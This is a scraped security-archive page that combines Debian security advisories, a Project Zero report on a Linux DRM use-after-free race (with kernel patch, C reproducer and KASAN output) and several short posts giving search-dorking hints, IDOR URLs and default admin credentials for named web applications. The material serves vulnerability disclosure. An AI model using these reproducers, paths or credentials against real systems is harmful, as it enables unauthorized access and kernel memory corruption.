Debian Linux Security Advisory 5737-1 - If LibreOffice failed to validate a signed macro, it displayed a warning but still allowed execution of the script after printing a warning. Going forward in high macro security mode such macros are now disabled.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5737-1                   security@debian.org  
https://www.debian.org/security/                       Moritz Muehlenhoff  
August 05, 2024                       https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : libreoffice  
CVE ID         : CVE-2024-6472

If LibreOffice failed to validate a signed macro, it displayed a warning  
but still allowed execution of the script after printing a warning.  
Going forward in high macro security mode such macros are now disabled.

For additional information please refer to  
https://www.libreoffice.org/about-us/security/advisories/cve-2024-6472/

For the oldstable distribution (bullseye), this problem has been fixed  
in version 1:7.0.4-4+deb11u10.

For the stable distribution (bookworm), this problem has been fixed in  
version 4:7.4.7-1+deb12u4.

We recommend that you upgrade your libreoffice packages.

For the detailed security status of libreoffice please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/libreoffice

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmaw7MgACgkQEMKTtsN8  
TjbwRg//Uj5T8Z48NWwyT/IrUxHiSGIPdjjg8l422Ya5oMfF28Ks3ApQPpMhnkwM  
YhsjZb6yRc9dxj81n5V78FtIKS5nqJ6A6NrPAb5fuan2pcULxbkvzDa9eGnhsg3G  
0+lhg60KsXs0Ef9ScjWARUcmW49ukqpnUEcTXWqmZ/DDF16G6OOD5oR4s5BUnBq0  
t41n5TvJC//13ptBnnI3iTq2rFMZz4jb/yoxGsc9WOvcTpb46yXKQnckIviMH4Nt  
FWsAOZuI24o9tWeB/HkOSCY/KploFkojrxQpIJg7M7UqCzK/woWI5JfuI+xaqSiB  
gibOqSohzYAxem1DhM/UckqXfgjpo91YgWVwbeaMfxX2VFCEUQW0ZiPQ/G4wQZMS  
zawp/6hMuBTIlX+zQaYb7uyC3iIUj3UFeGvoQmOfeSSxpDI4yp7cHNPQvSTe1mXB  
XlCzf8we/TzhjSKXcNvbYLnn2ro2fHRs3AwExZ+X24S1hfG+Fv9xnRk9VqqG8hiE  
Tc4nEX92aHprjDTXhofRG5oDEAmhz7nyVAWiyJDTYtQkdbooU5sDIjTol7Ednckp  
jTtkpajlIHfQrtjoxBFAU3MmUX1DIP8CUzOtrBsEdQ5yv3Y+zDLn4O1VJRGMfAzT  
TaZ7tFwYbE7/rQh/Kv6a55z1QfPK13aWLhLvx9jfwudl4zAytGk=  
=KIup  
-----END PGP SIGNATURE-----

Debian Security Advisory 5737-1

Linux DRM has drm_file_update_pid() call to get_pid() too late, which creates a race condition that can lead to use-after-free issue of a struct pid.

Linux: DRM: refcount incremented too late in drm_file_update_pid()

[I am sending this to security@ and to the drm-misc maintainers - based on https://drm.pages.freedesktop.org/maintainer-tools/committer-drm-misc.html#merge-criteria I think this falls into drm-misc's area of responsibility?]

=== summary ===  
drm_file_update_pid() calls get_pid() too late, which creates a race  
condition that can lead to use-after-free of a `struct pid`.

I will send a suggested patch off-list in a minute; let me know if you want me to resend it on the dri-devel list in case that works better for you.

=== verbose bug report ===  
drm_file_update_pid() contains the following code:

```  
  struct drm_device *dev;  
  struct pid *pid, *old;

  /*  
   * Master nodes need to keep the original ownership in order for  
   * drm_master_check_perm to keep working correctly. (See comment in  
   * drm_auth.c.)  
   */  
  if (filp->was_master)  
          return;

  pid = task_tgid(current);

  [...]

  dev = filp->minor->dev;  
  mutex_lock(&dev->filelist_mutex);  
  old = rcu_replace_pointer(filp->pid, pid, 1);  
  mutex_unlock(&dev->filelist_mutex);

  if (pid != old) {  
          get_pid(pid);  
          synchronize_rcu();  
          put_pid(old);  
  }  
```

filp->pid is a refcounted pointer which can only be modified under  
dev->filelist_mutex.  
After calling rcu_replace_pointer(), we have a refcount debt of 1, which is  
still fine because we're holding the mutex that prevents other tasks from  
taking ownership of the reference stored in filp->pid; but by the time we drop  
this mutex, we must have called get_pid() to make up for this refcount debt,  
and that isn't done.

So a use-after-free can occur in the following scenario, assuming filp->pid  
initially points to the pid of process A and process B's initial pid refcount  
is 1:

process A               process B  
=========               =========  
                        begin drm_file_update_pid  
                        mutex_lock(&dev->filelist_mutex)  
                        rcu_replace_pointer(filp->pid, <pid B>, 1)  
                        mutex_unlock(&dev->filelist_mutex)  
begin drm_file_update_pid  
mutex_lock(&dev->filelist_mutex)  
rcu_replace_pointer(filp->pid, <pid A>, 1)  
mutex_unlock(&dev->filelist_mutex)  
get_pid(<pid A>)  
synchronize_rcu()  
put_pid(<pid B>)   *** pid B reaches refcount 0 and is freed here ***  
                        get_pid(<pid B>)   *** UAF ***  
                        synchronize_rcu()  
                        put_pid(<pid A>)

Note that this race can only occur if RCU is configured so that  
running in preemptible task context can count as an RCU quiescent state.  
My testcase assumes that the kernel is configured for full preemption (meaning  
either CONFIG_PREEMPT=y or CONFIG_PREEMPT_DYNAMIC=y with full preemption  
selected at boot time); however, I think in theory the bug can probably be  
hit as long as CONFIG_PREEMPT_RCU=y is enabled (which is the case on kernel  
builds with dynamic preemption), since I think on such builds, expedited grace  
periods can still detect RCU quiescent states with IPIs.

My reproducer also requires that you patch the following code into the kernel  
to slow down execution and make the bug easy to trigger:

```  
diff --git a/drivers/gpu/drm/drm_file.c b/drivers/gpu/drm/drm_file.c  
index 638ffa4444f5..03e7711e9744 100644  
--- a/drivers/gpu/drm/drm_file.c  
+++ b/drivers/gpu/drm/drm_file.c  
@@ -38,6 +38,7 @@  
 #include <linux/pci.h>  
 #include <linux/poll.h>  
 #include <linux/slab.h>  
+#include <linux/delay.h>

 #include <drm/drm_client.h>  
 #include <drm/drm_drv.h>  
@@ -472,6 +473,12 @@ void drm_file_update_pid(struct drm_file *filp)  
        old = rcu_replace_pointer(filp->pid, pid, 1);  
        mutex_unlock(&dev->filelist_mutex);

+       if (strcmp(current->comm, \"SLOWME\") == 0) {  
+               pr_warn(\"%s: BEGIN DELAY\  
\", __func__);  
+               mdelay(1000);  
+               pr_warn(\"%s: END DELAY\  
\", __func__);  
+       }  
+  
        if (pid != old) {  
                get_pid(pid);  
                synchronize_rcu();  
```

The reproducer code:  
```  
#include <unistd.h>  
#include <stdio.h>  
#include <err.h>  
#include <fcntl.h>  
#include <stdlib.h>  
#include <sys/signal.h>  
#include <sys/ioctl.h>  
#include <sys/prctl.h>  
#include <sys/wait.h>  
#include <drm/drm.h>

#define SYSCHK(x) ({          \\  
  typeof(x) __res = (x);      \\  
  if (__res == (typeof(x))-1) \\  
    err(1, \"SYSCHK(\" #x \")\"); \\  
  __res;                      \\  
})

static void main_test_code() {  
  struct drm_version dummy_version;

  int drm_fd = SYSCHK(open(\"/dev/dri/renderD128\", O_RDONLY));  
  int child = SYSCHK(fork());

  if (child == 0) {  
    /* child process */  
    prctl(PR_SET_NAME, \"SLOWME\");  
    ioctl(drm_fd, DRM_IOCTL_VERSION, &dummy_version); // delay injected here  
  } else {  
    /* parent process */  
    usleep(200*1000);  
    ioctl(drm_fd, DRM_IOCTL_VERSION, &dummy_version);  
  }

  if (child == 0) {  
    /* child process */  
    exit(0);  
  } else {  
    /* parent process */  
    int status = 0;  
    pid_t child = wait(&status);  
    printf(\"wait() returned %d, status %d\  
\", child, status);  
    exit(0);  
  }  
}

int main(void) {  
  // run in a child process to avoid extra references from job control or such  
  int child = SYSCHK(fork());  
  if (child == 0) {  
    prctl(PR_SET_PDEATHSIG, SIGKILL);  
    main_test_code();  
  } else {  
    int status = 0;  
    pid_t child = wait(&status);  
    printf(\"wait() returned %d, status %d\  
\", child, status);  
  }  
}  
```

The resulting KASAN splat (tested on mainline plus the race widener patch  
above, with CONFIG_PREEMPT=y and CONFIG_KASAN=y):  
```  
 ==================================================================  
 BUG: KASAN: slab-use-after-free in drm_file_update_pid (./arch/x86/include/asm/atomic.h:93 (discriminator 4) ./include/linux/atomic/atomic-arch-fallback.h:749 (discriminator 4) ./include/linux/atomic/atomic-instrumented.h:253 (discriminator 4) ./include/linux/refcount.h:184 (discriminator 4) ./include/linux/refcount.h:241 (discriminator 4) ./include/linux/refcount.h:258 (discriminator 4) ./include/linux/pid.h:84 (discriminator 4) ./include/linux/pid.h:81 (discriminator 4) drivers/gpu/drm/drm_file.c:483 (discriminator 4))  
 Write of size 4 at addr ffff88811f2f68c0 by task SLOWME/1092

 CPU: 3 PID: 1092 Comm: SLOWME Not tainted 6.10.0-rc5-00035-gafcd48134c58-dirty #384  
 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014  
 Call Trace:  
  <TASK>  
 dump_stack_lvl (lib/dump_stack.c:117)  
 print_report (mm/kasan/report.c:378 mm/kasan/report.c:488)  
 kasan_report (mm/kasan/report.c:603)  
 kasan_check_range (mm/kasan/generic.c:175 (discriminator 1) mm/kasan/generic.c:189 (discriminator 1))  
 drm_file_update_pid (./arch/x86/include/asm/atomic.h:93 (discriminator 4) ./include/linux/atomic/atomic-arch-fallback.h:749 (discriminator 4) ./include/linux/atomic/atomic-instrumented.h:253 (discriminator 4) ./include/linux/refcount.h:184 (discriminator 4) ./include/linux/refcount.h:241 (discriminator 4) ./include/linux/refcount.h:258 (discriminator 4) ./include/linux/pid.h:84 (discriminator 4) ./include/linux/pid.h:81 (discriminator 4) drivers/gpu/drm/drm_file.c:483 (discriminator 4))  
 drm_ioctl_kernel (./include/drm/drm_drv.h:510 drivers/gpu/drm/drm_ioctl.c:737)  
 drm_ioctl (drivers/gpu/drm/drm_ioctl.c:842)  
 __x64_sys_ioctl (fs/ioctl.c:51 fs/ioctl.c:912 fs/ioctl.c:898 fs/ioctl.c:898)  
 do_syscall_64 (arch/x86/entry/common.c:52 (discriminator 1) arch/x86/entry/common.c:83 (discriminator 1))  
 entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)  
[...]  
  </TASK>

 Allocated by task 1091:  
 kasan_save_stack (mm/kasan/common.c:48)  
 kasan_save_track (./arch/x86/include/asm/current.h:49 (discriminator 1) mm/kasan/common.c:60 (discriminator 1) mm/kasan/common.c:69 (discriminator 1))  
 __kasan_slab_alloc (mm/kasan/common.c:312 mm/kasan/common.c:338)  
 kmem_cache_alloc_noprof (./include/linux/kasan.h:201 mm/slub.c:3940 mm/slub.c:4002 mm/slub.c:4009)  
 alloc_pid (kernel/pid.c:187)  
 copy_process (kernel/fork.c:2406)  
 kernel_clone (./include/linux/random.h:26 kernel/fork.c:2798)  
 __do_sys_clone (kernel/fork.c:2929)  
 do_syscall_64 (arch/x86/entry/common.c:52 (discriminator 1) arch/x86/entry/common.c:83 (discriminator 1))  
 entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)

 Freed by task 1091:  
 kasan_save_stack (mm/kasan/common.c:48)  
 kasan_save_track (./arch/x86/include/asm/current.h:49 (discriminator 1) mm/kasan/common.c:60 (discriminator 1) mm/kasan/common.c:69 (discriminator 1))  
 kasan_save_free_info (mm/kasan/generic.c:582 (discriminator 1))  
 poison_slab_object (mm/kasan/common.c:242)  
 __kasan_slab_free (mm/kasan/common.c:256 (discriminator 1))  
 kmem_cache_free (mm/slub.c:4438 (discriminator 3) mm/slub.c:4513 (discriminator 3))  
 put_pid.part.0 (kernel/pid.c:122)  
 drm_ioctl_kernel (./include/drm/drm_drv.h:510 drivers/gpu/drm/drm_ioctl.c:737)  
 drm_ioctl (drivers/gpu/drm/drm_ioctl.c:842)  
 __x64_sys_ioctl (fs/ioctl.c:51 fs/ioctl.c:912 fs/ioctl.c:898 fs/ioctl.c:898)  
 do_syscall_64 (arch/x86/entry/common.c:52 (discriminator 1) arch/x86/entry/common.c:83 (discriminator 1))  
 entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)

 The buggy address belongs to the object at ffff88811f2f68c0  
  which belongs to the cache pid of size 240  
 The buggy address is located 0 bytes inside of  
  freed 240-byte region [ffff88811f2f68c0, ffff88811f2f69b0)

 The buggy address belongs to the physical page:  
 page: refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x11f2f6  
 head: order:1 mapcount:0 entire_mapcount:0 nr_pages_mapped:0 pincount:0  
 flags: 0x200000000000040(head|node=0|zone=2)  
 page_type: 0xffffefff(slab)  
 raw: 0200000000000040 ffff888106686a00 dead000000000122 0000000000000000  
 raw: 0000000000000000 0000000080190019 00000001ffffefff 0000000000000000  
 head: 0200000000000040 ffff888106686a00 dead000000000122 0000000000000000  
 head: 0000000000000000 0000000080190019 00000001ffffefff 0000000000000000  
 head: 0200000000000001 ffffea00047cbd81 ffffffffffffffff 0000000000000000  
 head: 0000000000000002 0000000000000000 00000000ffffffff 0000000000000000  
 page dumped because: kasan: bad access detected

 Memory state around the buggy address:  
  ffff88811f2f6780: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  
  ffff88811f2f6800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fc fc  
 >ffff88811f2f6880: fc fc fc fc fc fc fc fc fa fb fb fb fb fb fb fb  
                                            ^  
  ffff88811f2f6900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb  
  ffff88811f2f6980: fb fb fb fb fb fb fc fc fc fc fc fc fc fc fc fc  
 ==================================================================  
```

=== disclosure deadline ===  
This bug is subject to a 90-day disclosure deadline. If a fix for this  
issue is made available to users before the end of the 90-day deadline,  
this bug report will become public 30 days after the fix was made  
available. Otherwise, this bug report will become public at the deadline.  
The scheduled deadline is 2024-09-25.

For more details, see the Project Zero vulnerability disclosure policy:  
https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-  
policy.html

Related CVE Numbers: CVE-2024-39486.

Found by: jannh@google.com

Linux DRM drm_file_update_pid() Race Condition / Use-After-Free

Debian Linux Security Advisory 5736-1 - Several vulnerabilities have been discovered in the OpenJDK Java runtime, which may result in denial of service, information disclosure or bypass of Java sandbox restrictions.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5736-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffAugust 05, 2024                       https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : openjdk-11CVE ID         : CVE-2024-21131 CVE-2024-21138 CVE-2024-21140 CVE-2024-21144                  CVE-2024-21145 CVE-2024-21147Several vulnerabilities have been discovered in the OpenJDK Java runtime,which may result in denial of service, information disclosure or bypassof Java sandbox restrictions.For the oldstable distribution (bullseye), these problems have been fixedin version 11.0.24+8-2~deb11u1.We recommend that you upgrade your openjdk-11 packages.For the detailed security status of openjdk-11 please refer toits security tracker page at:https://security-tracker.debian.org/tracker/openjdk-11Further information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmawyDoACgkQEMKTtsN8TjbQdw//SxWT8jSa26VAkBJtLN92c1Y3BJI6vHTuWJ49ywpUOGV/xuK4hAF03MfHpoDCT6immVyzUpnidZI63d2h1GYO08RvdXVZJOliywwgDf5WCPHU/e+7WR6ssJxZFLB1qVGmGgI5vq6X7BrTQlZ95ydlwkxTN//WM7Ey1OFzupVUg6ICJ2kNJLh/DYMnAOEJolLKeQMgpR95/Xt+gC6o2I9xD8AotajaEvRQXkEO745bMMv2zz0JxiaEA1e3faRII/lw2t/Sq8SlHOFaAmUBglOo45J1DRoGR5P0byYK9vnr7KxfzYj61/wgpG1yJqLG0LqtvYnsBSmFf9HMwoS8nNEpffIvkaBAdXj3cGaTssx9AINwT+hUWrcO2+LEXRgWYtATrtCAqik5tMxtQHIOG08XalF5KjuBwhmr0wOBAdvWcx6wkd5BJc1Tfj/ssHDJje3LYbtTVgIuHqIR7bwt+yvpx1GqwrgAnzLN+zRn2ooPScSYbGPWhg8tUitpxyGG4n6++ZehsJ47hXSXg2JMUlMM4IYdOCoIOVRrxAXJSlXZaeb8TSnA3tMHonkDrw6cl+BFUU07BwfkMzePt1sTBWRzkhJj9cvmhIKvKgTDeGuGXbs0xOoG3mXC8umKkpRl1Tun0OtsPSxYytxL9pnQPJrCclwt7OAsoUHRIbrRskcuTJ4==AyAA-----END PGP SIGNATURE-----

Debian Security Advisory 5736-1

AccPack Khanepani version 1.0 suffers from an insecure direct object reference vulnerability.

**AccPack Khanepani 1.0 Insecure Direct Object Reference**

Posted Jul 31, 2024

Authored by indoushka

AccPack Khanepani version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 760d2e5184238b42e8f1ba299d632f9a683af578d5af3fd433dd135eb0ceb06b

Download | Favorite | View

**AccPack Khanepani 1.0 Insecure Direct Object Reference**

    =============================================================================================================================================| # Title     : AccPack Khanepani v1.0 IDOR Vulnerability                                                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : leads to the creation of a new file in the list.[+] use payload : cms/gallery/insert.php[+] http://127.0.0.1/jamiatulamanepalorgnp/cms/gallery/insert.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,223)
*   Arbitrary (16,842)
*   BBS (2,859)
*   Bypass (1,855)
*   CGI (1,033)
*   Code Execution (7,784)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,384)
*   DoS (25,024)
*   Encryption (2,389)
*   Exploit (53,098)
*   File Inclusion (4,257)
*   File Upload (990)
*   Firewall (822)
*   Info Disclosure (2,885)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (896)
*   Kernel (7,184)
*   Local (14,788)
*   Magazine (586)
*   Overflow (13,165)
*   Perl (1,435)
*   PHP (5,221)
*   Proof of Concept (2,381)
*   Protocol (3,724)
*   Python (1,631)
*   Remote (31,625)
*   Root (3,633)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,024)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,275)
*   SQL Injection (16,594)
*   TCP (2,440)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,921)
*   Web (9,953)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,239)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,084)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,534)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,580)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,432)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,710)
*   UNIX (9,432)
*   UnixWare (187)
*   Windows (6,668)
*   Other

AccPack Khanepani 1.0 Insecure Direct Object Reference

Chuksrio LMS version 2.9 suffers from an insecure direct object reference vulnerability.

**Chuksrio LMS 2.9 Insecure Direct Object Reference**

Posted Jul 30, 2024

Authored by indoushka

Chuksrio LMS version 2.9 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 2913e2114833b1b975093b54cddc506496b54958798b2a0f6a2dd39c81193a02

Download | Favorite | View

**Chuksrio LMS 2.9 Insecure Direct Object Reference**

    ====================================================================================================================================| # Title     : Chuksrio LMS v2.9 IDOR Vulnerability                                                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface.[+] use payload : /admin/header.php?captcha[+] https://www/127.0.0.1/mefkayschools.org/admin/header.php?captchaGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,203)
*   Arbitrary (16,836)
*   BBS (2,859)
*   Bypass (1,854)
*   CGI (1,033)
*   Code Execution (7,783)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,383)
*   DoS (25,016)
*   Encryption (2,389)
*   Exploit (53,089)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,885)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (896)
*   Kernel (7,183)
*   Local (14,788)
*   Magazine (586)
*   Overflow (13,161)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,724)
*   Python (1,630)
*   Remote (31,622)
*   Root (3,632)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,024)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,275)
*   SQL Injection (16,591)
*   TCP (2,440)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,920)
*   Web (9,953)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,084)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,534)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,560)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,418)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,704)
*   UNIX (9,432)
*   UnixWare (187)
*   Windows (6,668)
*   Other

Chuksrio LMS 2.9 Insecure Direct Object Reference

Debian Linux Security Advisory 5734-2 - The security update announced as DSA 5734-1 caused a regression on configurations using the Samba DLZ module. Updated packages are now available to correct this issue.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5734-2                   security@debian.org  
https://www.debian.org/security/                     Salvatore Bonaccorso  
July 27, 2024                         https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : bind9  
Debian Bug     : 1074378

The security update announced as DSA 5734-1 caused a regression on  
configurations using the Samba DLZ module. Updated packages are now  
available to correct this issue.

For the stable distribution (bookworm), this problem has been fixed in  
version 1:9.18.28-1~deb12u2.

We recommend that you upgrade your bind9 packages.

For the detailed security status of bind9 please refer to its security  
tracker page at:  
https://security-tracker.debian.org/tracker/bind9

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmalaGpfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2  
NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND  
z0RQAA/+IIV9G8lTWHgh0YmMe1a84sYlo37BLBaCMeefUsBGBhngJlNCFT2m3YxA  
+zf6lMfHOvZPysMWoFqwIzRRo/wcQ9v4NhvZ0pEQaeUkCwqNzfWiUspoTLdGY/aw  
orrw6egUIv89lUDTixQpoI2+bhdM0ASrgpWV/AoAhELV0eUU29d2apsKr58um2W1  
HS1cu7IystRKaRqhZHdaQg5aHiOsuATne19OKQ+Zp9mQmgpzaw6gupRFNwcQC0tT  
9bVod4k4R5G/Z1takHW+ePrSEBfC7zWNYjrYLlEr0bf56tO1nZU9PQJuIPZfADaC  
TNtvkWTk5ZOEudDFiUXhkyjVT6o0sBS98/FzXqSRSlq1z51KeJy0QPziUdQjqcDV  
tV/314by4uXfLkRIXiTMQhtAP9HlTIdk8wy2ceX3sYwNPxfLT5oAoGVA2b1CLU7m  
MPU+qbu1fjJaebZJQA/L5WnHDLNPH4jMg6Pz3Kr7bbB8LEumC7zlp5T2IyY+BbHF  
ECBeZTsW27Gs1CS044ANmPrqoL5qE46YrIzWfYO5/hnvoM/f53JpshGGMYiKyW1r  
9CWN3IlZpxk8cEjtoudO6H5TlLHlUpfs+zwOVcCoer5TVsCwzy/achxXYS29xLLY  
3QeoAL3yBPnfvMUzynbUz9qovzt7p7csbg5cwf2C/lCP9imZUk8=  
=UY8Z  
-----END PGP SIGNATURE-----

Debian Security Advisory 5734-2

QuickJob version 6.1 suffers from an ignored default credential vulnerability.

**QuickJob 6.1 Insecure Settings**

Posted Jul 29, 2024

Authored by indoushka

QuickJob version 6.1 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | e6896d4cea9d5e1f38adf67e9cf29b00d07caf0ece1ebc4e316d431f13e72eca

Download | Favorite | View

**QuickJob 6.1 Insecure Settings**

    ====================================================================================================================================| # Title     : quickjob 6.1 Insecure Settings Vulnerability                                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://codecanyon.net/item/quickjob-job-board-php-script/25217096                                                 |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user&pass: admin[+] panel : https://www/127.0.0.1/xpressdigitalonline/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,161)
*   Arbitrary (16,833)
*   BBS (2,859)
*   Bypass (1,853)
*   CGI (1,033)
*   Code Execution (7,780)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (25,014)
*   Encryption (2,389)
*   Exploit (53,083)
*   File Inclusion (4,257)
*   File Upload (989)
*   Firewall (822)
*   Info Disclosure (2,876)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (895)
*   Kernel (7,179)
*   Local (14,782)
*   Magazine (586)
*   Overflow (13,153)
*   Perl (1,435)
*   PHP (5,220)
*   Proof of Concept (2,381)
*   Protocol (3,723)
*   Python (1,630)
*   Remote (31,618)
*   Root (3,625)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,023)
*   Shell (3,272)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,271)
*   SQL Injection (16,589)
*   TCP (2,440)
*   Trojan (690)
*   UDP (901)
*   Virus (669)
*   Vulnerability (32,911)
*   Web (9,949)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,236)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,090)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,084)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,534)
*   HPUX (880)
*   iOS (376)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,556)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,418)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,700)
*   UNIX (9,431)
*   UnixWare (187)
*   Windows (6,667)
*   Other

QuickJob 6.1 Insecure Settings

Prison Management System version version 1.0 suffers from an ignored default credential vulnerability.

**Prison Management System version 1.0 Insecure Settings**

Posted Jul 29, 2024

Authored by indoushka

Prison Management System version version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 81a9d01f3c8c94bb0000f4403731ff41830ed447ed13fdad39cbe7cc67884842

Download | Favorite | View

**Prison Management System version 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : Prison Management System version 1.0 Insecure Settings Vulnerability                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/php/15368/prison-management-system-phpoop-free-source-code.html                     |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/untcarriercom/admin/?page=system_infoGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,161)
*   Arbitrary (16,833)
*   BBS (2,859)
*   Bypass (1,853)
*   CGI (1,033)
*   Code Execution (7,780)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,380)
*   DoS (25,014)
*   Encryption (2,389)
